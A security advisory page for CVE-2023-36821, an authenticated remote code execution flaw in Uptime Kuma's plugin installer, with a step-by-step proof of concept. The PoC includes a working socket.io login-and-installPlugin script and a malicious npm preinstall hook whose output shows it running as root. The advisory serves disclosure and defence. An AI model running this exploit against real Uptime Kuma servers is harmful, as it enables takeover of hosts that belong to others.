logo

Advisories

Weaknesses

Fixes

Requirements

Compliance

CVE-2023-36821 uptime-kuma

Package

Manager: npm
Name: uptime-kuma
Vulnerable Version: >=0 <1.22.1

Severity

Level: High

CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

EPSS: 0.02508 pctl0.84793

Details

Uptime Kuma vulnerable to authenticated remote code execution via malicious plugin installation ### Summary Installation of a maliciously crafted plugin allows for remote code execution by an authenticated attacker. ### Details Uptime Kuma allows authenticated users to install plugins from an official list of plugins. This feature is currently disabled in the web interface, but the corresponding API endpoints are still available after login. After downloading a plugin, it's installed by calling `npm install` in the installation directory of the plugin: https://github.com/louislam/uptime-kuma/blob/8c60e902e1c76ecbbd1b0423b07ce615341cb850/server/plugins-manager.js#L210-L216 Because the plugin is not validated against the official list of plugins or installed with `npm install --ignore-scripts`, a maliciously crafted plugin taking advantage of [npm scripts](https://docs.npmjs.com/cli/v9/using-npm/scripts) can gain remote code execution. ### PoC In the PoC below, the plugin at https://github.com/n-thumann/npm-install-script-poc will be installed. It only consists of an empty `index.js` and a `package.json` containing the script: `"preinstall": "echo \"Malicious code could have been executed as user $(whoami)\" > /tmp/poc"`. This will be executed when installing the plugin. 1. Start Uptime Kuma: `docker run -d -p 3001:3001 -v uptime-kuma:/app/data --name uptime-kuma louislam/uptime-kuma:1` 2. Create a user using the Uptime Kuma web interface, e.g. user `admin` with password `admin123` 3. Confirm that the PoC file to be created doesn't exist yet: ``` ➜ ~ docker exec -it uptime-kuma cat /tmp/poc cat: /tmp/poc: No such file or directory ``` 4. Create file `poc.js` with the following content: ``` SERVER = "ws://localhost:3001"; USERNAME = "admin"; PASSWORD = "admin123"; const { io } = require("socket.io-client"); const socket = io(SERVER); const repo = "https://github.com/n-thumann/npm-install-script-poc"; const name = "npm-install-script-poc"; socket.emit( "login", { username: USERNAME, password: PASSWORD, token: "" }, (res) => { if (res.ok !== true) return console.log("Login failed"); console.log("Login successful"); socket.emit("installPlugin", repo, name, () => { console.log("Done"); socket.close(); }); } ); ``` 5. Install `socket.io-client`: `npm install socket.io-client` 6. Run the script: `node poc.js`: ``` # node poc.js Login successful Done ``` 7. The PoC file has been created: ``` ➜ ~ docker exec -it uptime-kuma cat /tmp/poc Malicious code could have been executed as user root ``` ### Impact This vulnerability allows authenticated attacker to gain remote code execution on the server Uptime Kuma is running on.

Metadata

Created: 2024-05-01T10:01:24Z
Modified: 2024-05-01T10:01:24Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/05/GHSA-7grx-f945-mj96/GHSA-7grx-f945-mj96.json
CWE IDs: ["CWE-20"]
Alternative ID: GHSA-7grx-f945-mj96
Finding: F184
Auto approve: 1